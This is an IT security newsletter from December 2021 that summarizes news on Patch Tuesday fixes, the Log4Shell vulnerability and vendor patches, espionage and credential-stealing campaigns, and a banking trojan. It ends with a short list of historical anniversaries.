IT Security Newsletter - 12/15/2021
Microsoft Patch Tuesday, December 2021 Edition
Microsoft, Adobe, and Google all issued security updates to their products today. The Microsoft patches include six previously disclosed security flaws, and one that is already being actively exploited. But this month's Patch Tuesday is overshadowed by the "Log4Shell" 0-day exploit in a popular Java library that web server administrators are now racing to find and patch amid widespread exploitation of the flaw. READ MORE...
Log4Shell: A new fix, details of active attacks, and risk mitigation recommendations
Due to the extraordinary widespread use of the open-source Apache Log4j library, the saga of the Log4Shell (CVE-2021-44228) vulnerability is nowhere near finished. As Dr. Johannes Ullrich, Dean of Research at the SANS Technology Institute, recently noted, "Log4Shell will continue to haunt us for years to come." His advice? "Dealing with Log4Shell will be a marathon. Treat it as such." So let's see what's the latest news that can impact your mitigation and remediation efforts. READ MORE...
Telecom operators targeted in recent espionage hacking campaign
Researchers have spotted a new espionage hacking campaign targeting telecommunication and IT service providers in the Middle East and Asia. The campaign has been conducted over the past six months, and there are tentative links to the Iranian-backed actor, MERCURY (aka MuddyWater, SeedWorm, or TEMP.Zagros). The report comes from the Threat Hunter Team at Symantec, who has collected evidence and toolset samples from recent attacks. READ MORE...
Hackers steal Microsoft Exchange credentials using IIS module
Threat actors are installing a malicious IIS web server module named 'Owowa' on Microsoft Exchange Outlook Web Access servers to steal credentials and execute commands on the server remotely. The development of Owowa likely started in late 2020 based on compilation data and when it was uploaded to the VirtusTotal malware scanning service. Based on Kaspersky's telemetry data, the most recent sample in circulation is from April 2021, targeting servers in Malaysia, Mongolia, Indonesia, and the Philippines. READ MORE...
Microsoft patches spoofing vulnerability exploited by Emotet (CVE-2021-43890)
It's the final Patch Tuesday of 2021 and Microsoft has delivered fixes for 67 vulnerabilities, including a spoofing vulnerability (CVE-2021-43890) actively exploited to deliver Emotet/Trickbot/Bazaloader malware family. Of the 67 CVE-numbered flaws, CVE-2021-43890 - a Windows AppX Installer spoofing vulnerability - will, understandably, be a patching priority. READ MORE...
SAP Patches Log4Shell Vulnerability in 20 Applications
German software maker SAP is scrambling to patch the Log4Shell vulnerability in its applications and has rolled out fixes for tens of other severe flaws in its products. SAP identified a total of 32 applications affected by CVE-2021-44228, a critical vulnerability in the Apache Log4j Java-based logging tool, and has already shipped patches for 20 of them, while scrambling to fix the remaining 12 as soon as possible. READ MORE...
Apple iOS Update Fixes Cringey iPhone 13 Jailbreak Exploit
As if the Log4Shell hellscape wasn't already driving everybody starkers, it's time to update iOS 15.2 and a crop of other Apple iGadgets, lest your iPhone get taken over by a malicious app that executes arbitrary code with kernel privileges. To paraphrase one mobile security expert, the iOS 15.2 and iPadOS update - released by Apple on Monday along with updates for macOS, tvOS and watchOS - is as hairy as a Lhasa Apso. READ MORE...
400 Banks' Customers Targeted with Anubis Trojan
Customers of Chase, Wells Fargo, Bank of America and Capital One, along with nearly 400 other financial institutions, are being targeted by a malicious app disguised to look like the official account management platform for French telecom company Orange S.A. Researchers say this is just the beginning. Once downloaded, the malware - a variant of banking trojan Anubis - steals the user's personal data to rip them off, researchers at Lookout warned in a new report. READ MORE...
Log4j: List of vulnerable products and vendor advisories
News about a critical vulnerability in the Apache Log4j logging library broke last week when proof-of-concept exploits started to emerge on Thursday. Log4j is an open-source Java logging framework part of the Apache Logging Services used at enterprise level in various applications from vendors across the world. Apache released Log4j 2.15.0 to address the maximum severity vulnerability, currently tracked as CVE-2021-44228, also referred to as Log4Shell or LogJam. READ MORE...
- ...in 1791, the Bill of Rights is ratified by the Virginia General Assembly, officially becoming law.
- ...in 1832, French architect and engineer Gustave Eiffel, the co-designer of the Eiffel Tower, is born in Dijon.
- ...in 1933, the Twenty-first Amendment to the US Constitution goes into effect, repealing the Eighteenth Amendment and ending federal prohibition of alcohol.
- ...in 1978, the United States announces that it will recognize the People's Republic of China, severing diplomatic relations with Taiwan.